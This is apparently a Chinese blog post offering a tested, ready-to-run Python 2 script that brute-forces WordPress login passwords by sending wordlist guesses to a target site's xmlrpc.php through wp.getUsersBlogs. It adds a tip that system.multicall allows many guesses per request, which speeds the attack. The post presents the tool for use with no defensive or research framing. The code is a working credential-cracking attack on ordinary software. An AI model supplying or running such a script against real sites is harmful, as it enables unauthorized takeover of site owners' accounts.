暴力破解wordpress密码

使用方法：
python wp.py username pass.txt https://www.xxs.com
1
#!/usr/bin/env python

2
# -*- coding: gbk -*-

3
# -*- coding: utf-8 -*-

4
# Date: 2015/4/29

5
# Created by 独自等待

6
# 博客 http://www.waitalone.cn/

7
import os, sys, time

8
import urllib2

9

10
def usage():

11
    os.system(['clear', 'cls'][os.name == 'nt'])

12
    print '+' + '-' * 50 + '+'

13
    print '\t Python WordPress暴力破解工具单线程版'

14
    print '\t   Blog：http://www.waitalone.cn/'

15
    print '\t       Code BY： 独自等待'

16
    print '\t       Time：2015-04-29'

17
    print '+' + '-' * 50 + '+'

18
    if len(sys.argv) != 4:

19
        print '用法: ' + os.path.basename(sys.argv[0]) + '  用户名  密码字典  待破解的网站URL地址  '

20
        print '实例: ' + os.path.basename(sys.argv[0]) + '  admin  pass.txt http://www.waitalone.cn/ '

21
        sys.exit()

22

23

24
def crack(password):

25
    """

26
    WordPress xmlrpc暴力破解

27
    """

28
    crack_url = url + 'xmlrpc.php'

29
    post = '''

30
        <?xml version="1.0" encoding="iso-8859-1"?>

31
        <methodCall>

32
          <methodName>wp.getUsersBlogs</methodName>

33
          <params>

34
           <param><value>''' + username + '''</value></param>

35
           <param><value>''' + password + '''</value></param>

36
          </params>

37
        </methodCall>

38
    '''

39
    header = {

40
        'UserAgent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)',

41
        'Referer': crack_url

42
    }

43
    try:

44
        req = urllib2.Request(crack_url, data=post, headers=header)

45
        res = urllib2.urlopen(req, timeout=10).read().decode('utf-8').encode('GBK')

46
    except Exception, msg:

47
        print '爷,发生错误了!', msg

48
    else:

49
        if '<int>405</int>' in res:

50
            print '[×] 报告爷,此站点已禁用XML-RPC服务!'

51
            sys.exit('\n[!] 卧槽,这么快就执行完了?用时：%s 秒' % (time.time() - start))

52
        elif 'faultCode' in res:

53
            print '[×] 报告爷,正在尝试密码:', password

54
        elif 'isAdmin' in res:

55
            print '\n[√] 报告爷,密码破解成功:', password

56
            sys.exit('\n[!] 卧槽,这么快就执行完了?用时：%s 秒' % (time.time() - start))

57

58

59
if __name__ == '__main__':

60
    usage()

61
    username = sys.argv[1]

62
    url = sys.argv[3]

63
    if url[-1] != '/': url += '/'

64
    print '[√] 目标：', url + '\n'

65
    start = time.time()

66
    if os.path.isfile(sys.argv[2]):

67
        passlist = [x.strip() for x in open(sys.argv[2])]

68
        print '[√] 报告爷,共有密码[ %d ]行!\n' % len(passlist)

69
        try:

70
            for password in passlist:

71
                crack(password)

72
        except KeyboardInterrupt:

73
            print '\n[!] 爷,按您的吩咐,已成功退出!'

74
    else:

75
        print '[X] 爷,没找到密码字典,破解个毛呀?'
经测试，可用！
暴力破解wordpress密码
这里还讲到，可以使用system.multicall方法，在单个请求中进行多次尝试（即允许应用程序通过一条HTTP请求，执行多个命令）。
本文暂无标签
Related Posts

发表回复
